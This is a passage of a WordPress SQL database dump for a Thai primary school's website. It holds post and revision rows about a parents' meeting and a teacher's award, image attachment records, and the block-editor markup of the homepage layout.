พร้อมทั้งมีการมอบเงินค่าเครื่องแบบนักเรียนและค่าอุปกรณ์การเรียน ตามโครงการสนับสนุนค่าใช้จ่ายในการจัดการศึกษา เรียนฟรี 15 ปี','','inherit','closed','closed','','469-revision-v1','','','2025-06-06 13:34:53','2025-06-06 06:34:53','',469,'http://watprato.ssk.in.th/?p=481',0,'revision','',0),
(482,1,'2025-06-06 13:39:30','2025-06-06 06:39:30','<!-- wp:image {\"id\":483,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499049665_122228239400202781_4657595105248751273_n-724x1024.jpg\" alt=\"\" class=\"wp-image-483\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":484,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/500025451_122228239478202781_8712159298643584980_n-1024x726.jpg\" alt=\"\" class=\"wp-image-484\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":485,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499420191_122228240156202781_2677112695390255535_n-1024x726.jpg\" alt=\"\" class=\"wp-image-485\"/></figure>\n<!-- /wp:image -->','เมื่อวันที่ 17 พฤษภาคม 2568 เวลา 13.00-16.00 น. โรงเรียนอนุบาลวัดพระโต นำโดย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ได้ดำเนินการประชุมผู้ปกครองนักเรียน ระดับชั้นประถมศึกษาปีที่ 4-6 ภาคเรียนที่ 1 ประจำปีการศึกษา 2568 เพื่อร่วมกันพัฒนาการจัดการศึกษา คัดเลือกคณะกรรมการเครือข่ายผู้ปกครอง พร้อมทั้งมีการมอบเงินค่าเครื่องแบบนักเรียนและค่าอุปกรณ์การเรียน ตามโครงการสนับสนุนค่าใช้จ่ายในการจัดการศึกษา เรียนฟรี 15 ปี','','publish','open','open','','%e0%b9%80%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-17-%e0%b8%9e%e0%b8%a4%e0%b8%a9%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b8%a1-2568-%e0%b9%80%e0%b8%a7%e0%b8%a5','','','2025-06-06 13:44:46','2025-06-06 06:44:46','',0,'http://watprato.ssk.in.th/?p=482',0,'post','',0),
(483,1,'2025-06-06 13:38:20','2025-06-06 06:38:20','','499049665_122228239400202781_4657595105248751273_n','','inherit','open','closed','','499049665_122228239400202781_4657595105248751273_n','','','2025-06-06 13:38:20','2025-06-06 06:38:20','',482,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/499049665_122228239400202781_4657595105248751273_n.jpg',0,'attachment','image/jpeg',0),
(484,1,'2025-06-06 13:38:45','2025-06-06 06:38:45','','500025451_122228239478202781_8712159298643584980_n','','inherit','open','closed','','500025451_122228239478202781_8712159298643584980_n','','','2025-06-06 13:38:45','2025-06-06 06:38:45','',482,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/500025451_122228239478202781_8712159298643584980_n.jpg',0,'attachment','image/jpeg',0),
(485,1,'2025-06-06 13:38:59','2025-06-06 06:38:59','','499420191_122228240156202781_2677112695390255535_n','','inherit','open','closed','','499420191_122228240156202781_2677112695390255535_n','','','2025-06-06 13:38:59','2025-06-06 06:38:59','',482,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/499420191_122228240156202781_2677112695390255535_n.jpg',0,'attachment','image/jpeg',0),
(486,1,'2025-06-06 13:39:19','2025-06-06 06:39:19','<!-- wp:image {\"id\":483,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499049665_122228239400202781_4657595105248751273_n-724x1024.jpg\" alt=\"\" class=\"wp-image-483\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":484,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/500025451_122228239478202781_8712159298643584980_n-1024x726.jpg\" alt=\"\" class=\"wp-image-484\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":485,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499420191_122228240156202781_2677112695390255535_n-1024x726.jpg\" alt=\"\" class=\"wp-image-485\"/></figure>\n<!-- /wp:image -->','เมื่อวันที่ 17 พฤษภาคม 2568 เวลา 13.00-16.00 น. โรงเรียนอนุบาลวัดพระโต นำโดย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ได้ดำเนินการประชุมผู้ปกครองนักเรียน ระดับชั้นประถมศึกษาปีที่ 4-6 ภาคเรียนที่ 1 ประจำปีการศึกษา 2568 เพื่อร่วมกันพัฒนาการจัดการศึกษา คัดเลือกคณะกรรมการเครือข่ายผู้ปกครอง พร้อมทั้งมีการมอบเงินค่าเครื่องแบบนักเรียนและค่าอุปกรณ์การเรียน ตามโครงการสนับสนุนค่าใช้จ่ายในการจัดการศึกษา เรียนฟรี 15 ปี','','inherit','closed','closed','','482-revision-v1','','','2025-06-06 13:39:19','2025-06-06 06:39:19','',482,'http://watprato.ssk.in.th/?p=486',0,'revision','',0),
(487,1,'2025-06-06 13:41:43','2025-06-06 06:41:43','','500321709_122228239412202781_2013079884334630748_n','','inherit','open','closed','','500321709_122228239412202781_2013079884334630748_n','','','2025-06-06 13:41:43','2025-06-06 06:41:43','',482,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/500321709_122228239412202781_2013079884334630748_n.jpg',0,'attachment','image/jpeg',0),
(489,1,'2025-06-06 13:44:46','2025-06-06 06:44:46','<!-- wp:image {\"id\":483,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499049665_122228239400202781_4657595105248751273_n-724x1024.jpg\" alt=\"\" class=\"wp-image-483\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":484,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/500025451_122228239478202781_8712159298643584980_n-1024x726.jpg\" alt=\"\" class=\"wp-image-484\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":485,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499420191_122228240156202781_2677112695390255535_n-1024x726.jpg\" alt=\"\" class=\"wp-image-485\"/></figure>\n<!-- /wp:image -->','เมื่อวันที่ 17 พฤษภาคม 2568 เวลา 13.00-16.00 น. โรงเรียนอนุบาลวัดพระโต นำโดย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ได้ดำเนินการประชุมผู้ปกครองนักเรียน ระดับชั้นประถมศึกษาปีที่ 4-6 ภาคเรียนที่ 1 ประจำปีการศึกษา 2568 เพื่อร่วมกันพัฒนาการจัดการศึกษา คัดเลือกคณะกรรมการเครือข่ายผู้ปกครอง พร้อมทั้งมีการมอบเงินค่าเครื่องแบบนักเรียนและค่าอุปกรณ์การเรียน ตามโครงการสนับสนุนค่าใช้จ่ายในการจัดการศึกษา เรียนฟรี 15 ปี','','inherit','closed','closed','','482-revision-v1','','','2025-06-06 13:44:46','2025-06-06 06:44:46','',482,'http://watprato.ssk.in.th/?p=489',0,'revision','',0),
(490,1,'2025-06-06 14:42:57','2025-06-06 07:42:57','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":494,\"sizeSlug\":\"medium\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-medium\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/498670339_1093158059515626_6804921364808443539_n-1-300x251.jpg\" alt=\"\" class=\"wp-image-494\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับคุณครูสริตา เข็มทอง ผู้ได้รับคัดเลือกรางวัล ครูผู้สอนดีเด่น กลุ่มสาระการเรียนรู้ภาษาต่างประเทศดีเด่น (ภาษาอังกฤษ)ประจำปี 2568 จังหวัดศรีสะเกษ','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95-9','','','2025-06-06 14:46:27','2025-06-06 07:46:27','',0,'http://watprato.ssk.in.th/?p=490',0,'post','',0),
(491,1,'2025-06-06 14:42:43','2025-06-06 07:42:43','','498670339_1093158059515626_6804921364808443539_n','','inherit','open','closed','','498670339_1093158059515626_6804921364808443539_n','','','2025-06-06 14:42:43','2025-06-06 07:42:43','',490,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/498670339_1093158059515626_6804921364808443539_n.jpg',0,'attachment','image/jpeg',0),
(492,1,'2025-06-06 14:42:47','2025-06-06 07:42:47','<!-- wp:paragraph -->\n<p>ขอแสดงความยินดีกับคุณครูสริตา เข็มทอง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>ผู้ได้รับคัดเลือกรางวัล ครูผู้สอนดีเด่น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>กลุ่มสาระการเรียนรู้ภาษาต่างประเทศดีเด่น (ภาษาอังกฤษ)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประจำปี 2568 จังหวัดศรีสะเกษ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":491,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/498670339_1093158059515626_6804921364808443539_n.jpg\" alt=\"\" class=\"wp-image-491\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','490-revision-v1','','','2025-06-06 14:42:47','2025-06-06 07:42:47','',490,'http://watprato.ssk.in.th/?p=492',0,'revision','',0),
(494,1,'2025-06-06 14:43:58','2025-06-06 07:43:58','','498670339_1093158059515626_6804921364808443539_n','','inherit','open','closed','','498670339_1093158059515626_6804921364808443539_n-2','','','2025-06-06 14:43:58','2025-06-06 07:43:58','',490,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/498670339_1093158059515626_6804921364808443539_n-1.jpg',0,'attachment','image/jpeg',0),
(495,1,'2025-06-06 14:44:28','2025-06-06 07:44:28','<!-- wp:paragraph -->\n<p>ขอแสดงความยินดีกับคุณครูสริตา เข็มทอง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>ผู้ได้รับคัดเลือกรางวัล ครูผู้สอนดีเด่น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>กลุ่มสาระการเรียนรู้ภาษาต่างประเทศดีเด่น (ภาษาอังกฤษ)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประจำปี 2568 จังหวัดศรีสะเกษ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":494,\"sizeSlug\":\"medium\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-medium\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/498670339_1093158059515626_6804921364808443539_n-1-300x251.jpg\" alt=\"\" class=\"wp-image-494\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','490-revision-v1','','','2025-06-06 14:44:28','2025-06-06 07:44:28','',490,'http://watprato.ssk.in.th/?p=495',0,'revision','',0),
(496,1,'2025-06-06 14:46:25','2025-06-06 07:46:25','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":494,\"sizeSlug\":\"medium\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-medium\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/498670339_1093158059515626_6804921364808443539_n-1-300x251.jpg\" alt=\"\" class=\"wp-image-494\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับคุณครูสริตา เข็มทอง ผู้ได้รับคัดเลือกรางวัล ครูผู้สอนดีเด่น กลุ่มสาระการเรียนรู้ภาษาต่างประเทศดีเด่น (ภาษาอังกฤษ)ประจำปี 2568 จังหวัดศรีสะเกษ','','inherit','closed','closed','','490-revision-v1','','','2025-06-06 14:46:25','2025-06-06 07:46:25','',490,'http://watprato.ssk.in.th/?p=496',0,'revision','',0),
(498,1,'2025-06-27 13:43:35','2025-06-27 06:43:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0f4859-9f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0f4859-9f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 